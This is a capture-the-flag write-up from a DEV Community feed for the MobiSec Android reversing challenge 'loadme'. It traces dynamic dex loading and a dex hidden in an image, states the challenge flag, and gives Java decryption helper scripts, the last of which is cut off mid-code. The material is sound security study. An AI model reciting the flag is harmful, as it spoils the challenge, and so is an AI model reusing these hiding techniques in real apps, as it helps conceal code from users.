DEV Community: R Srikesh The latest articles on DEV Community by R Srikesh (@komi). https://dev.to/komi https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1095856%2Fd61e34b1-dc72-4e2f-baea-d05b8b856684.jpg DEV Community: R Srikesh https://dev.to/komi en Mobisec Reversing - loadme [Writeup] R Srikesh Mon, 05 Jun 2023 12:10:40 +0000 https://dev.to/komi/mobisec-reversing-loadme-writeup-3l19 https://dev.to/komi/mobisec-reversing-loadme-writeup-3l19 <p>in loadme.apk </p> <p>1) test.dex is downloaded from <a href="https://challs.reyammer.io/loadme/stage1.apk"><code>https://challs.reyammer.io/loadme/stage1.apk</code></a> </p> <p>2) Dynamically loading class <code>com.mobisec.stage1.LoadImage</code> and method <code>load</code></p> <p>On unloading test.dex and Opening <strong>LoadImage.smali</strong> </p> <p>1) An image <code>logo.png</code> is read and saved as a dex file named <code>logo.dex</code> (image can be found in initial apk)</p> <p>2) Dynamically Loading <code>com.mobisec.stage2.Check</code> class and calling method <code>check</code></p> <p>On unloading logo.dex and Opening <strong>Check.smali</strong> we get the flag</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--68J1bSTs--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g23tiaeaoibqed8pxz8b.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--68J1bSTs--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g23tiaeaoibqed8pxz8b.png" alt="Flag" width="800" height="101"></a></p> <p>Flag: <code>MOBISEC{dynamic_code_loading_can_make_everything_tricky_eh?}</code></p> <p>Scripts used </p> <p><strong>for loadme.apk</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">import</span> <span class="nn">java.io.BufferedInputStream</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.File</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.FileInputStream</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.FileOutputStream</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.InputStream</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.UnsupportedEncodingException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.net.HttpURLConnection</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.net.URL</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.security.InvalidAlgorithmParameterException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.security.InvalidKeyException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.security.NoSuchAlgorithmException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.Base64</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.crypto.BadPaddingException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.crypto.Cipher</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.crypto.IllegalBlockSizeException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.crypto.NoSuchPaddingException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.crypto.spec.IvParameterSpec</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.crypto.spec.SecretKeySpec</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">s</span><span class="o">{</span> <span class="kd">static</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">initVector</span> <span class="o">=</span> <span class="o">{-</span><span class="mi">34</span><span class="o">,</span> <span class="o">-</span><span class="mi">83</span><span class="o">,</span> <span class="o">-</span><span class="mi">66</span><span class="o">,</span> <span class="o">-</span><span class="mi">17</span><span class="o">,</span> <span class="o">-</span><span class="mi">34</span><span class="o">,</span> <span class="o">-</span><span class="mi">83</span><span class="o">,</span> <span class="o">-</span><span class="mi">66</span><span class="o">,</span> <span class="o">-</span><span class="mi">17</span><span class="o">,</span> <span class="o">-</span><span class="mi">34</span><span class="o">,</span> <span class="o">-</span><span class="mi">83</span><span class="o">,</span> <span class="o">-</span><span class="mi">66</span><span class="o">,</span> <span class="o">-</span><span class="mi">17</span><span class="o">,</span> <span class="o">-</span><span class="mi">34</span><span class="o">,</span> <span class="o">-</span><span class="mi">83</span><span class="o">,</span> <span class="o">-</span><span class="mi">66</span><span class="o">,</span> <span class="o">-</span><span class="mi">17</span><span class="o">};</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">InvalidKeyException</span><span class="o">,</span> <span class="nc">NoSuchAlgorithmException</span><span class="o">,</span> <span class="nc">NoSuchPaddingException</span><span class="o">,</span> <span class="nc">InvalidAlgorithmParameterException</span><span class="o">,</span> <span class="nc">IllegalBlockSizeException</span><span class="o">,</span> <span class="nc">BadPaddingException</span><span class="o">,</span> <span class="nc">UnsupportedEncodingException</span> <span class="o">{</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="n">gu</span><span class="o">());</span> <span class="nc">String</span> <span class="n">path</span> <span class="o">=</span> <span class="n">dc</span><span class="o">(</span><span class="n">gu</span><span class="o">());</span> <span class="c1">//download test.dex</span> <span class="n">da</span><span class="o">(</span><span class="n">path</span><span class="o">);</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="n">gc</span><span class="o">());</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="n">gm</span><span class="o">());</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">gu</span><span class="o">()</span> <span class="kd">throws</span> <span class="nc">InvalidKeyException</span><span class="o">,</span> <span class="nc">NoSuchAlgorithmException</span><span class="o">,</span> <span class="nc">NoSuchPaddingException</span><span class="o">,</span> <span class="nc">InvalidAlgorithmParameterException</span><span class="o">,</span> <span class="nc">IllegalBlockSizeException</span><span class="o">,</span> <span class="nc">BadPaddingException</span><span class="o">,</span> <span class="nc">UnsupportedEncodingException</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">url</span> <span class="o">=</span> <span class="n">ds</span><span class="o">(</span><span class="s">"MAi9CEe4K9a+JzgsNqdYYh13dk7SQQ/yo5BN5HF39nYtgnOBmO4EV9Y2sQDthTG9"</span><span class="o">);</span> <span class="k">return</span> <span class="n">url</span><span class="o">;</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">gm</span><span class="o">()</span> <span class="kd">throws</span> <span class="nc">InvalidKeyException</span><span class="o">,</span> <span class="nc">NoSuchAlgorithmException</span><span class="o">,</span> <span class="nc">NoSuchPaddingException</span><span class="o">,</span> <span class="nc">InvalidAlgorithmParameterException</span><span class="o">,</span> <span class="nc">IllegalBlockSizeException</span><span class="o">,</span> <span class="nc">BadPaddingException</span><span class="o">,</span> <span class="nc">UnsupportedEncodingException</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">ds</span><span class="o">(</span><span class="s">"6RSjLOfRkvb/qXa34Y7cOQ=="</span><span class="o">);</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">da</span><span class="o">(</span><span class="nc">String</span> <span class="n">path</span><span class="o">)</span> <span class="o">{</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">xorKey</span> <span class="o">=</span> <span class="s">"com.mobisec.dexclassloader"</span><span class="o">.</span><span class="na">getBytes</span><span class="o">();</span> <span class="nc">File</span> <span class="n">file</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="n">path</span><span class="o">);</span> <span class="kt">int</span> <span class="n">size</span> <span class="o">=</span> <span class="o">(</span><span class="kt">int</span><span class="o">)</span> <span class="n">file</span><span class="o">.</span><span class="na">length</span><span class="o">();</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">bytes</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="o">[</span><span class="n">size</span><span class="o">];</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">decbytes</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="o">[</span><span class="n">size</span><span class="o">];</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">BufferedInputStream</span> <span class="n">buf</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">BufferedInputStream</span><span class="o">(</span><span class="k">new</span> <span class="nc">FileInputStream</span><span class="o">(</span><span class="n">file</span><span class="o">));</span> <span class="n">buf</span><span class="o">.</span><span class="na">read</span><span class="o">(</span><span class="n">bytes</span><span class="o">,</span> <span class="mi">0</span><span class="o">,</span> <span class="n">bytes</span><span class="o">.</span><span class="na">length</span><span class="o">);</span> <span class="n">buf</span><span class="o">.</span><span class="na">close</span><span class="o">();</span> <span class="k">for</span> <span class="o">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">size</span><span class="o">;</span> <span class="n">i</span><span class="o">++)</span> <span class="o">{</span> <span class="n">decbytes</span><span class="o">[</span><span class="n">i</span><span class="o">]</span> <span class="o">=</span> <span class="o">(</span><span class="kt">byte</span><span class="o">)</span> <span class="o">(</span><span class="n">bytes</span><span class="o">[</span><span class="n">i</span><span class="o">]</span> <span class="o">^</span> <span class="n">xorKey</span><span class="o">[</span><span class="n">i</span> <span class="o">%</span> <span class="n">xorKey</span><span class="o">.</span><span class="na">length</span><span class="o">]);</span> <span class="o">}</span> <span class="nc">File</span> <span class="n">outFile</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="n">path</span><span class="o">);</span> <span class="nc">FileOutputStream</span> <span class="n">out</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">FileOutputStream</span><span class="o">(</span><span class="n">outFile</span><span class="o">,</span> <span class="kc">false</span><span class="o">);</span> <span class="n">out</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">decbytes</span><span class="o">);</span> <span class="n">out</span><span class="o">.</span><span class="na">flush</span><span class="o">();</span> <span class="n">out</span><span class="o">.</span><span class="na">close</span><span class="o">();</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Exception</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="n">e</span><span class="o">.</span><span class="na">printStackTrace</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">dc</span><span class="o">(</span><span class="nc">String</span> <span class="n">url</span><span class="o">)</span> <span class="o">{</span> <span class="k">try</span> <span class="o">{</span> <span class="no">URL</span> <span class="n">downloaded_url</span> <span class="o">=</span> <span class="k">new</span> <span class="no">URL</span><span class="o">(</span><span class="n">url</span><span class="o">);</span> <span class="nc">HttpURLConnection</span> <span class="n">urlConnection</span> <span class="o">=</span> <span class="o">(</span><span class="nc">HttpURLConnection</span><span class="o">)</span> <span class="n">downloaded_url</span><span class="o">.</span><span class="na">openConnection</span><span class="o">();</span> <span class="n">urlConnection</span><span class="o">.</span><span class="na">connect</span><span class="o">();</span> <span class="nc">File</span> <span class="n">file</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="n">gf</span><span class="o">());</span> <span class="nc">FileOutputStream</span> <span class="n">fileOutput</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">FileOutputStream</span><span class="o">(</span><span class="n">file</span><span class="o">);</span> <span class="nc">InputStream</span> <span class="n">inputStream</span> <span class="o">=</span> <span class="n">urlConnection</span><span class="o">.</span><span class="na">getInputStream</span><span class="o">();</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">buffer</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="o">[</span><span class="mi">1024</span><span class="o">];</span> <span class="k">while</span> <span class="o">(</span><span class="kc">true</span><span class="o">)</span> <span class="o">{</span> <span class="kt">int</span> <span class="n">bufferLength</span> <span class="o">=</span> <span class="n">inputStream</span><span class="o">.</span><span class="na">read</span><span class="o">(</span><span class="n">buffer</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">bufferLength</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="o">)</span> <span class="o">{</span> <span class="n">fileOutput</span><span class="o">.</span><span class="na">close</span><span class="o">();</span> <span class="k">return</span> <span class="n">file</span><span class="o">.</span><span class="na">getAbsolutePath</span><span class="o">();</span> <span class="o">}</span> <span class="n">fileOutput</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">buffer</span><span class="o">,</span> <span class="mi">0</span><span class="o">,</span> <span class="n">bufferLength</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Exception</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">null</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">ds</span><span class="o">(</span><span class="nc">String</span> <span class="n">enc</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">NoSuchAlgorithmException</span><span class="o">,</span> <span class="nc">NoSuchPaddingException</span><span class="o">,</span> <span class="nc">InvalidKeyException</span><span class="o">,</span> <span class="nc">InvalidAlgorithmParameterException</span><span class="o">,</span> <span class="nc">IllegalBlockSizeException</span><span class="o">,</span> <span class="nc">BadPaddingException</span><span class="o">,</span> <span class="nc">UnsupportedEncodingException</span><span class="o">{</span> <span class="nc">String</span> <span class="n">key</span> <span class="o">=</span> <span class="s">"mobiseccomkey!!!"</span><span class="o">;</span> <span class="nc">IvParameterSpec</span> <span class="n">iv</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">IvParameterSpec</span><span class="o">(</span><span class="n">initVector</span><span class="o">);</span> <span class="nc">SecretKeySpec</span> <span class="n">skeySpec</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">SecretKeySpec</span><span class="o">(</span><span class="n">key</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(</span><span class="s">"UTF-8"</span><span class="o">),</span> <span class="s">"AES"</span><span class="o">);</span> <span class="nc">Cipher</span> <span class="n">cipher</span> <span class="o">=</span> <span class="nc">Cipher</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"AES/CBC/PKCS5PADDING"</span><span class="o">);</span> <span class="n">cipher</span><span class="o">.</span><span class="na">init</span><span class="o">(</span><span class="mi">2</span><span class="o">,</span> <span class="n">skeySpec</span><span class="o">,</span> <span class="n">iv</span><span class="o">);</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">original</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="na">doFinal</span><span class="o">(</span><span class="nc">Base64</span><span class="o">.</span><span class="na">getDecoder</span><span class="o">().</span><span class="na">decode</span><span class="o">(</span><span class="n">enc</span><span class="o">.</span><span class="na">getBytes</span><span class="o">()));</span> <span class="k">return</span> <span class="k">new</span> <span class="nf">String</span><span class="o">(</span><span class="n">original</span><span class="o">);</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">gf</span><span class="o">()</span> <span class="kd">throws</span> <span class="nc">InvalidKeyException</span><span class="o">,</span> <span class="nc">NoSuchAlgorithmException</span><span class="o">,</span> <span class="nc">NoSuchPaddingException</span><span class="o">,</span> <span class="nc">InvalidAlgorithmParameterException</span><span class="o">,</span> <span class="nc">IllegalBlockSizeException</span><span class="o">,</span> <span class="nc">BadPaddingException</span><span class="o">,</span> <span class="nc">UnsupportedEncodingException</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">ds</span><span class="o">(</span><span class="s">"QLrdlqkhOkxIe5FEfpCLWw=="</span><span class="o">);</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">gc</span><span class="o">()</span> <span class="kd">throws</span> <span class="nc">InvalidKeyException</span><span class="o">,</span> <span class="nc">NoSuchAlgorithmException</span><span class="o">,</span> <span class="nc">NoSuchPaddingException</span><span class="o">,</span> <span class="nc">InvalidAlgorithmParameterException</span><span class="o">,</span> <span class="nc">IllegalBlockSizeException</span><span class="o">,</span> <span class="nc">BadPaddingException</span><span class="o">,</span> <span class="nc">UnsupportedEncodingException</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">ds</span><span class="o">(</span><span class="s">"ca9O9YbCZ/+vIYUvxPQUHA4SgyL/m3cwlvVZ4ArkBFQ="</span><span class="o">);</span> <span class="c1">// return ds("6RSjLOfRkvb/qXa34Y7cOQ==");</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p><strong>test.dex</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">import</span> <span class="nn">java.io.BufferedInputStream</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.File</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.FileInputStream</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.FileOutputStream</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.InputStream</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.io.OutputStream</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.Base64</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.regex.Pattern</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.crypto.Cipher</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.crypto.spec.IvParameterSpec</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.crypto.spec.SecretKeySpec</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">ss</span><span class="o">{</span> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">initVector</span> <span class="o">=</span> <span class="o">{-</span><span class="mi">34</span><span class="o">,</span> <span class="o">-</span><span class="mi">83</span><span class="o">,</span> <span class="o">-</span><span class="mi">66</span><span class="o">,</span> <span class="o">-</span><span class="mi">17</span><span class="o">,</span> <span class="o">-</span><span class="mi">34</span><span class="o">,</span> <span class="o">-</span><span class="mi">83</span><span class="o">,</span> <span class="o">-</span><span class="mi">66</span><span class="o">,</span> <span class="o">-</span><span class="mi">17</span><span class="o">,</span> <span class="o">-</span><span class="mi">34</span><span class="o">,</span> <span class="o">-</span><span class="mi">83</span><span class="o">,</span> <span class="o">-</span><span class="mi">66</span><span class="o">,</span> <span class="o">-</span><span class="mi">17</span><span class="o">,</span> <span class="o">-</span><span class="mi">34</span><span class="o">,</span> <span class="o">-</span><span class="mi">83</span><span class="o">,</span> <span class="o">-</span><span class="mi">66</span><span class="o">,</span> <span class="o">-</span><span class="mi">17</span><span class="o">};</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">){</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="n">getAssetsName</span><span class="o">());</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="n">getCodeName</span><span class="o">());</span> <span class="c1">//load();</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="n">generateClass</span><span class="o">());</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="n">generateMethod</span><span class="o">());</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">generateClass</span><span class="o">()</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">decryptString</span><span class="o">(</span><span class="s">"4hJIFOEdvGy81kngg5W2mh4ZMYOQVmqX+FqCg8UmFmc="</span><span class="o">);</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">generateMethod</span><span class="o">()</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">decryptString</span><span class="o">(</span><span class="s">"zkKQzoRGUwBJurGdAYVuMw=="</span><span class="o">);</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">getAssetsName</span><span class="o">()</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">decryptString</span><span class="o">(</span><span class="s">"VYsdn556h+cox7bnQV4UsA=="</span><span class="o">);</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">getCodeName</span><span class="o">()</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">decryptString</span><span class="o">(</span><span class="s">"SXkAHK1O8Ssd6aCiqtpiAg=="</span><span class="o">);</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">decryptString</span><span class="o">(</span><span class="nc">String</span> <span class="n">enc</span><span class="o">)</span> <span class="o">{</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">parts</span> <span class="o">=</span> <span class="s">"com.mobisec.stage1"</span><span class="o">.</span><span class="na">split</span><span class="o">(</span><span class="nc">Pattern</span><span class="o">.</span><span class="na">quote</span><span class="o">(</span><span class="s">"."</span><span class="o">));</span> <span class="nc">String</span> <span class="n">key</span> <span class="o">=</span> <span class="s">"!!!"</span> <span class="o">+</span> <span class="n">parts</span><span class="o">[</span><span class="mi">0</span><span class="o">]</span> <span class="o">+</span> <span class="n">parts</span><span class="o">[</span><span class="mi">1</span><span class="o">]</span> <span class="o">+</span> <span class="s">"key"</span><span class="o">;</span> <span class="nc">IvParameterSpec</span> <span class="n">iv</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">IvParameterSpec</span><span class="o">(</span><span class="n">initVector</span><span class="o">);</span> <span class="nc">SecretKeySpec</span> <span class="n">skeySpec</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">SecretKeySpec</span><span class="o">(</span><span class="n">key</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(</span><span class="s">"UTF-8"</span><span class="o">),</span> <span class="s">"AES"</span><span class="o">);</span> <span class="nc">Cipher</span> <span class="n">cipher</span> <span class="o">=</span> <span class="nc">Cipher</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"AES/CBC/PKCS5PADDING"</span><span class="o">);</span> <span class="n">cipher</span><span class="o">.</span><span class="na">init</span><span class="o">(</span><span class="mi">2</span><span class="o">,</span> <span class="n">skeySpec</span><span class="o">,</span> <span class="n">iv</span><span class="o">);</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">original</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="na">doFinal</span><span class="o">(</span><span class="nc">Base64</span><span class="o">.</span><span class="na">getDecoder</span><span class="o">().</span><span class="na">decode</span><span class="o">(</span><span class="n">enc</span><span class="o">.</span><span class="na">getBytes</span><span class="o">()));</span> <span class="k">return</span> <span class="k">new</span> <span class="nf">String</span><span class="o">(</span><span class="n">original</span><span class="o">);</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Exception</span> <span class="n">ex</span><span class="o">)</span> <span class="o">{</span> <span class="n">ex</span><span class="o">.</span><span class="na">printStackTrace</span><span class="o">();</span> <span class="k">return</span> <span class="kc">null</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="nf">load</span><span class="o">()</span> <span class="o">{</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">xorKey</span> <span class="o">=</span> <span class="s">"weneedtogodeeper"</span><span class="o">.</span><span class="na">getBytes</span><span class="o">();</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">InputStream</span> <span class="n">in</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">FileInputStream</span><span class="o">(</span><span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="s">"logo.png"</span><span class="o">));</span> <span class="nc">File</span> <span class="n">outFile</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="n">getCodeName</span><span class="o">());</span> <span class="nc">OutputStream</span> <span class="n">out</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">FileOutputStream</span><span class="o">(</span><span class="n">outFile</span><span class="o">);</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">buffer</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="o">[</span><span class="mi">1024</span><span class="o">];</span> <span class="k">while</span> <span class="o">(</span><span class="kc">true</span><span class="o">)</span> <span class="o">{</span> <span class="kt">int</span> <span class="n">read</span> <span class="o">=</span> <span class="n">in</span><span class="o">.</span><span class="na">read</span><span class="o">(</span><span class="n">buffer</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">read</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="o">)</span> <span class="o">{</span> <span class="n">out</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">buffer</span><span class="o">,</span> <span class="mi">0</span><span class="o">,</span> <span class="n">read</span><span class="o">);</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="n">in</span><span class="o">.</span><span class="na">close</span><span class="o">();</span> <span class="n">out</span><span class="o">.</span><span class="na">close</span><span class="o">();</span> <span class="n">decryptApk</span><span class="o">(</span><span class="n">outFile</span><span class="o">.</span><span class="na">getAbsolutePath</span><span class="o">(),</span> <span class="n">xorKey</span><span class="o">);</span> <span class="c1">// return loadClass(ctx, outFile.getAbsolutePath(), flag);</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Exception</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">decryptApk</span><span class="o">(</span><span class="nc">String</span> <span class="n">path</span><span class="o">,</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">xorKey</span><span class="o">)</span> <span class="o">{</span> <span class="nc">File</span> <span class="n">file</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="n">path</span><span class="o">);</span> <span class="kt">int</span> <span class="n">size</span> <span class="o">=</span> <span class="o">(</span><span class="kt">int</span><span class="o">)</span> <span class="n">file</span><span class="o">.</span><span class="na">length</span><span class="o">();</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">bytes</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="o">[</span><span class="n">size</span><span class="o">];</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">decbytes</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="o">[</span><span class="n">size</span><span class="o">];</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">BufferedInputStream</span> <span class="n">buf</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">BufferedInputStream</span><span class="o">(</span><span class="k">new</span> <span class="nc">FileInputStream</span><span class="o">(</span><span class="n">file</span><span class="o">));</span> <span class="n">buf</span><span class="o">.</span><span class="na">read</span><span class="o">(</span><span class="n">bytes</span><span class="o">,</span> <span class="mi">0</span><span class="o">,</span> <span class="n">bytes</span><span class="o">.</span><span class="na">length</span><span class="o">);</span> <span class="n">buf</span><span class="o">.</span><span class="na">close</span><span class="o">();</span> <span class="k">for</span> <span class="o">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">size</span><span class="o">;</span> <span class="n">i</span><span class="o">++)</span> <span class="o">{</span> <span class="n">decbytes</span><span class="o">[</span><span class="n">i</span><span class="o">]</span> <span class="o">=</span> <span class="o">(</span><span class="kt">byte</span><span class="o">)</span> <span class="o">(</span><span class="n">bytes</span><span class="o">[</span><span class="n">i</span><span class="o">]</span> <span class="o">^</span> <span class="n">xorKey</span><span class="o">[</span><span class="n">i</span> <span class="o">%</span> <span class="n">xorKey</span><span class="o">.</span><span class="na">length</span><span class="o">]);</span> <span class="o">}</span> <span class="nc">File</span> <span class="n">outFile</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="n">path</span><span class="o">);</span> <span class="nc">FileOutputStream</span> <span class="n">out</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">FileOutputStream</span><span class="o">(</span><span class="n">outFile</span><span class="o">,</span> <span class="kc">false</span><span class="o">);</span> <span class="n">out</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">decbytes</span><span class="o">);</span> <span class="n">out</span><span class="o">.</span><span class="na">flush</span><span class="o">();</span> <span class="n">out</span><span class="o">.</span><span class="na">close</span><span class="o">();</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Exception</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="n">e</span><span class="o">.</span><span class="na">printStackTrace</span><span class="o">();</span> <span 